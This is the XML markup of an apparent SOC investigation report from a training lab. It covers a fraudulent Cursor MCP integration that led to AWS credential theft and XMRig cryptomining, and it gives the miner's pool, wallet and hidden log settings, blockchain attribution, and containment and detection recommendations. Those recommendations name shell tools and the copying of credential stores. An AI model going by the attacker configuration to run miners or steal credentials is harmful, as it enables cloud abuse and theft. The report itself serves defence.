                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Miner</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XMRig 6.26.0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ED">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">RandomX (-a rx)</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EF">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pool</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">rx.unmineable.com:3333</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F1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Wallet parameter</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SOL:HkGz4KmoZ7Zmk7HN6ndJ31UJ1qZ2qgwQxgVqQwovpZES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F3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Worker format</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ip-&lt;hostname-derived&gt;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F5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CPU cap</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">50%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F7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Log file</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/tmp/.sys_monitor.log</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114300" distR="114300">
            <wp:extent cx="5989320" cy="3383615"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="43" l="0" r="0" t="43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5989320" cy="338361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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 11 — Recovered mining.sh showing XMRig, mining pool, wallet, and background execution options.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Finding: The attacker was mining through unMineable using the RandomX algorithm. The payout address was a Solana wallet, so the lab’s requested cryptocurrency answer was Solana.</w:t>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10. Blockchain Attribution and Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1 Public Attribution Research</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: The Solana wallet address was searched using a public search engine. Results associated the same address with reports of an April 2026 Drift Protocol compromise, including a result describing funds routed from the primary exploit wallet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="3307579"/>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89320" cy="3307579"/>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center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 12 — Public search results linking the wallet address to the Drift Protocol exploit.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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10.2 Solscan Transfer Validation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: The wallet was opened in Solscan and the Transfers view was filtered to From: Drift Vault and Token: dSOL, with oldest transfers first. One matching transfer was displayed. Solscan publicly labeled the destination wallet “Drift Exploiter 1” and showed an incoming transfer of 45,292.208963921 dSOL from Drift Vault.</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1"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Blockchain field</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Observed value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08">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Wallet</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">HkGz4KmoZ7Zmk7HN6ndJ31UJ1qZ2qgwQxgVqQwovpZES</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0A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Public label</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Drift Exploiter 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0C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Source</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Drift Vault</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0E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Token</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dSOL</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10">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Amount</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcP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sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">45,292.208963921 dSOL</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112">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Displayed historical value</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$4,466,805.96</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drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="3374841"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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89320" cy="3374841"/>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center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 13 — Solscan filtered transfer showing 45,292.208963921 dSOL from Drift Vault to Drift Exploiter 1.</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12. Root Cause and Contributing Factors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untrusted MCP integration was installed without validating the publisher, source repository, or configuration.</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Cursor was permitted to execute an arbitrary shell command embedded in MCP configuration.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Long-lived AWS credentials were stored locally on the developer workstation.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compromised IAM user had sufficient privilege to launch expensive EC2 instances in multiple regions.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preventive service control policy, quota, budget alarm, or regional restriction stopped the deployment.</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attacker mimicked a legitimate automation user agent and used a plausible production tag to reduce suspicion.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Containment and Eradication</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Isolate and forensically preserve the developer workstation; remove the malicious MCP configuration and s.exe only after evidence collection.</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Disable the compromised admin IAM user, revoke all access keys and active sessions, and rebuild access under least privilege.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Terminate all unauthorized EC2 instances in all regions and inspect associated volumes, snapshots, security groups, key pairs, launch templates, elastic IPs, and spot requests.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Block awesomeawsmcp.com, 3.72.63.40, the payload URL, and rx.unmineable.com:3333 at DNS, proxy, firewall, EDR, and cloud egress layers.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Rotate every credential or secret accessible from the workstation or compromised AWS identity.</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Preserve CloudTrail, Sysmon, browser, Cursor, billing, and blockchain evidence for incident review and cost-dispute procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w: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14. Detection and Hardening Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint and Developer Tooling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Allow-list approved MCP servers and require security review of any configuration containing shell interpreters, curl, PowerShell, wget, or remote URLs.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Detect execution chains in which Cursor or another IDE spawns cmd.exe, PowerShell, curl, or an unsigned binary from a temporary directory.</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Alert on creation of hidden staging directories and copying of .aws, .azure, .config/gcloud, kubeconfig, SSH, or browser credential stores.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EDR application control to prevent untrusted binaries from executing from user-writable temporary paths.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS Controls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Replace long-lived access keys with AWS IAM Identity Center or short-lived role credentials protected by MFA.</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Apply service control policies and IAM conditions restricting EC2 instance families, approved regions, and maximum resource creation.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detections for bursts of RunInstances from a new IP, unusual user agent, disabled monitoring, or high-cost GPU instance types.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Enable AWS Budgets, Cost Anomaly Detection, per-region quotas, and automated quarantine or termination workflows for unauthorized resources.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Alert on the same principal creating resources across several regions within a short period.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network and Threat Intelligence</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Block direct outbound mining protocols and monitor DNS/TLS connections to known mining pools.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Ingest wallet, IP, domain, URL, and user-agent indicators into SIEM and EDR watchlists.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Treat public blockchain labels as corroborating intelligence, not sole proof of identity or attribution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">16. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The supplied evidence supports a high-confidence conclusion that a fraudulent Cursor MCP integration caused code execution on the developer workstation, enabled command-and-control, and facilitated theft of privileged AWS credentials. The attacker then used those credentials from 3.72.63.40 to launch 16 p3.2xlarge instances across four regions and operate an XMRig miner connected to unMineable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The configured Solana wallet was independently associated with a Drift Protocol exploit and received 45,292.208963921 dSOL from Drift Vault. Although this blockchain linkage does not by itself prove the same individual conducted every activity, the exact wallet match provides strong infrastructure-level correlation between the mining operation and the exploit-linked address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence limitation: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This report is based on the supplied lab artifacts and screenshots. Public labels, displayed token values, and search results are time-sensitive and should be preserved with timestamps when used outside a training context.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId20" w:type="default"/>
      <w:footerReference r:id="rId2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CursorJack Endpoint and AWS Cloud Security Incident  |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space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:color="1f4e79" w:space="0" w:sz="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17365d"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">CONFIDENTIAL — SOC INVESTIGATION REPORT     CursorJack | April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Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:color w:val="1f4e79"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>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1f4e79"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
